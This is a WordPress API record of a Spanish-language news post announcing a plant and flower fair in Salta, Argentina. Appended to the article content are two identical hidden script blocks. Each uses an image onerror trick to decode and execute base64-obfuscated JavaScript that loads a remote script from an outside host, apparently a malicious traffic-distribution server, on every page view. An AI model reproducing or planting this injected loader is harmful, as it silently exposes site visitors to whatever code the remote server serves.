{"id":1906,"date":"2022-12-07T12:02:26","date_gmt":"2022-12-07T15:02:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1906"},"modified":"2025-08-14T00:28:32","modified_gmt":"2025-08-14T03:28:32","slug":"la-municipalidad-de-salta-invita-a-la-feria-de-plantas-y-flores-en-el-paseo-ameghino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1906","title":{"rendered":"La municipalidad de Salta, invita a la Feria de Plantas\u00a0y Flores en el Paseo\u00a0Ameghino\u00a0\u00a0"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#e01e4f\"><strong>Organizada por el grupo\u00a0Plantas y Flores del NOA, bajo el programa Por un Mundo m\u00e1s\u00a0Verde, podr\u00e1 ser visitada\u00a0los d\u00edas\u00a08 y 9 de diciembre, de 9 a 20 horas.<\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a la Feria de Plantas y Flores que se llevar\u00e1 a cabo este jueves&nbsp;8 y viernes 9 de diciembre, de 9 a 20 horas, en el Paseo Ameghino<\/p>\n\n\n\n<p>Organizada por el grupo Plantas y Flores del NOA, bajo el programa Por un Mundo m\u00e1s Verde, la actividad contar\u00e1 adem\u00e1s de la exposici\u00f3n, con las charlas de Mauro Gallo, productor de&nbsp; lombricultura y de la ingeniera Daniela Moneta del programa Pro Huerta del INTA Salta. Adem\u00e1s, habr\u00e1 intercambio de semillas (no venta) y sorteo de plantas.<\/p>\n\n\n\n<p>\u00abSomos parte del ecosistema y de su correcto uso. Debemos tomar conciencia a trav\u00e9s de un trabajo en conjunto en una l\u00ednea educativa y formativa con los habitantes de Salta y los visitantes,&nbsp;record\u00e1ndoles que el h\u00e1bitat mejora la calidad de vida, resguarda el medio ambiente con equilibrio y armon\u00eda. Esta acci\u00f3n ayuda a prevenir la contaminaci\u00f3n y el posterior da\u00f1o ambiental\u201d, afirman desde el grupo organizador de estas jornadas.<\/p>\n\n\n\n<p>Y agregan: \u201cSeamos jardineros del universo, las generaciones futuras deben estar orgullosas de la herencia legada con responsabilidad y compromiso. Todos debemos cuidar el medio ambiente que nos rodea\u00bb.<\/p>\n\n\n\n<p>Los productores de Plantas y Flores del NOA, cuentan con viveros de especies arb\u00f3reas, arbustivas nativas, suculentas, cact\u00e1ceas y no cact\u00e1ceas (crasas). Tambi\u00e9n poseen Tillandsias y Bromelias nativas aut\u00f3ctonas con variedad en aromas y colores. Las Tillandsias y Bromelias son unas de las \u00fanicas especies que s\u00f3lo habitan el continente occidental americano de norte a sur.<\/p>\n\n\n\n<p><strong>Acerca de \u00abPor un Mundo M\u00e1s Verde\u00bb&nbsp;<\/strong><\/p>\n\n\n\n<p>Es un proyecto que se inicia en abril del 2022 en San Lorenzo con planteros, artesanos y un prestador gastron\u00f3mico.<\/p>\n\n\n\n<p>Tiene&nbsp;como objetivo principal y fundamental brindar conocimiento&nbsp; a la comunidad para preservar las especies nativas en v\u00edas de peligro de extinci\u00f3n, promoviendo la conservaci\u00f3n del patrimonio natural.<\/p>\n\n\n\n<p>Con el tiempo se desarroll\u00f3 el enfoque, el estudio y el crecimiento que llev\u00f3 al desarrollo de actividades como la gran&nbsp;Expo Noa&nbsp;en julio con m\u00e1s de 3500&nbsp;espectadores con entrada libre gratuita.<\/p>\n\n\n\n<p>El proyecto m\u00e1s all\u00e1 de poder lograr un lugar de ventas para cada productor propone un cambio radical en la cultura de aprendizaje en las infancias, adolescencias y en todas las etapas de la vida<\/p>\n\n\n\n<p>Es la introducci\u00f3n del conocimiento de la rica diversidad de especies que contiene la&nbsp;parte natural de esta zona.<\/p>\n\n\n\n<p>Para poder lograr este enfoque se han vivenciado viajes internacionales que permitieron conocer parques ecol\u00f3gicos de reserva de flora y fauna en Santa Cruz de La Sierra&nbsp;dedicados a la conservaci\u00f3n.<\/p>\n\n\n\n<p>El Jard\u00edn Bot\u00e1nico Municipal es materia de estudio, as\u00ed como el Patrimonio Mundial de Samaipata.<\/p>\n\n\n\n<p>Se han realizado interiorizaciones del Noa y estudios e investigaci\u00f3n de especies de flora en peligro de extinci\u00f3n, desde el a\u00f1o 2018<\/p>\n\n\n\n<p>Por el trabajo realizado se ha representado a la provincia obteniendo premios y menciones especiales&nbsp;por la calidad de los cultivos y conocimientos<\/p>\n\n\n\n<p>Los recursos naturales son patrimonio de toda la humanidad, por lo tanto se deben modificar los h\u00e1bitos y actuar como guardianes de la naturaleza.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"572\" data-id=\"1908\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-1024x572.jpg\" alt=\"\" class=\"wp-image-1908\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-1024x572.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-300x168.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-768x429.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-696x389.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-1068x596.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2-752x420.jpg 752w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-2.jpg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"993\" height=\"610\" data-id=\"1907\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3.webp\" alt=\"\" class=\"wp-image-1907\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3.webp 993w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3-300x184.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3-768x472.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3-696x428.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3-684x420.webp 684w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/feria-de-plantas-y-flores-3-356x220.webp 356w\" sizes=\"(max-width: 993px) 100vw, 993px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Organizada por el grupo\u00a0Plantas y Flores del NOA, bajo el programa Por un Mundo m\u00e1s\u00a0Verde, podr\u00e1 ser visitada\u00a0los d\u00edas\u00a08 y 9 de diciembre, de 9 a 20 horas. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a la Feria de Plantas y Flores que se llevar\u00e1 a cabo este [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1909,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[4,17],"tags":[],"class_list":{"0":"post-1906","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-paisajes","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1906"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1906"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1906\/revisions"}],"predecessor-version":[{"id":7251,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1906\/revisions\/7251"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1909"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1906"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}